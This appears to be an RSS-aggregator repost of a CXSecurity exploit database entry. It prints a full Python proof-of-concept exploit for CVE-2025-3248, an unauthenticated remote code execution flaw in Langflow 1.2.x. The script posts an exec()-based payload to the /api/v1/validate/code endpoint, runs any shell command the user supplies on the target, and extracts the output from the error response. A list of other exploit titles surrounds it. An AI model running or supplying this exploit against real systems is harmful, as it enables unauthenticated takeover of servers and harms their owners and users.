惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

S
Schneier on Security
P
Proofpoint News Feed
Apple Machine Learning Research
Apple Machine Learning Research
WordPress大学
WordPress大学
博客园 - Franky
V
V2EX
爱范儿
爱范儿
J
Java Code Geeks
小众软件
小众软件
Last Week in AI
Last Week in AI
The Cloudflare Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Hugging Face - Blog
Hugging Face - Blog
T
The Blog of Author Tim Ferriss
酷 壳 – CoolShell
酷 壳 – CoolShell
The Register - Security
The Register - Security
GbyAI
GbyAI
Vercel News
Vercel News
Y
Y Combinator Blog
腾讯CDC
F
Fortinet All Blogs
I
InfoQ
N
Netflix TechBlog - Medium
B
Blog RSS Feed
D
Docker
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
量子位
博客园 - 司徒正美
阮一峰的网络日志
阮一峰的网络日志
The GitHub Blog
The GitHub Blog
Microsoft Security Blog
Microsoft Security Blog
V
Visual Studio Blog
博客园 - 三生石上(FineUI控件)
宝玉的分享
宝玉的分享
Blog — PlanetScale
Blog — PlanetScale
H
Help Net Security
云风的 BLOG
云风的 BLOG
A
About on SuperTechFans
Scott Helme
Scott Helme
T
Tor Project blog
U
Unit 42
Google Online Security Blog
Google Online Security Blog
PCI Perspectives
PCI Perspectives
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
NISL@THU
NISL@THU
D
Darknet – Hacking Tools, Hacker News & Cyber Security
aimingoo的专栏
aimingoo的专栏
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
Security Archives - TechRepublic
Security Archives - TechRepublic

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Langflow 1.2.x Remote Code Execution (RCE)
2025-08-03 · via The Exploit Database - CXSecurity.com

Langflow 1.2.x Remote Code Execution (RCE)

#!/usr/bin/env python3 # Exploit Title: Langflow 1.2.x - Remote Code Execution (RCE) # Date: 2025-07-11 # Exploit Author: Raghad Abdallah Al-syouf # Vendor Homepage: https://github.com/logspace-ai/langflow # Software Link: https://github.com/logspace-ai/langflow/releases # Version: <= 1.2.x # Tested on: Ubuntu / Docker # CVE: CVE-2025-3248 # Description: #Langflow exposes a vulnerable endpoint `/api/v1/validate/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands. # Usage: #python3 cve-2025-3248.py http://target:7860 "id" import requests import argparse import json from urllib.parse import urljoin from colorama import Fore, Style, init import random init(autoreset=True) requests.packages.urllib3.disable_warnings() BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX] def show_banner(): print(f"""{Style.BRIGHT}{random.choice(BANNER_COLORS)} ╔════════════════════════════════════════════════════╗ ║ Langflow <= 1.2.x - CVE-2025-3248 ║ ║ Remote Code Execution via exposed API ║ ║ No authentication — triggers exec() call ║ ╚════════════════════════════════════════════════════╝ Author: Raghad Abdallah Al-syouf {Style.RESET_ALL}""") class LangflowRCE: def __init__(self, target_url, timeout=10): self.base_url = target_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.session.headers = { "User-Agent": "Langflow-RCE-Scanner", "Content-Type": "application/json" } self.timeout = timeout def run_payload(self, command): endpoint = urljoin(self.base_url, "/api/v1/validate/code") payload = { "code": ( f"def run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass" ) } print(f"{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}") try: response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout) print(f"{Fore.YELLOW}[+] HTTP {response.status_code}") if response.status_code == 200: try: json_data = response.json() err = json_data.get("function", {}).get("errors", [""])[0] if isinstance(err, str) and err.startswith("b'"): output = err[2:-1].encode().decode("unicode_escape").strip() return output or "[!] No output returned." except Exception as e: return f"[!] Error parsing response: {e}" return "[!] Target may not be vulnerable or is patched." except Exception as e: return f"[!] Request failed: {e}" def main(): parser = argparse.ArgumentParser(description="PoC - CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE") parser.add_argument("url", help="Target URL (e.g., http://localhost:7860)") parser.add_argument("cmd", help="Command to execute remotely (e.g., whoami)") args = parser.parse_args() show_banner() exploit = LangflowRCE(args.url) result = exploit.run_payload(args.cmd) print(f"\n{Fore.GREEN}[+] Command Output:\n{Style.RESET_ALL}{result}") if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com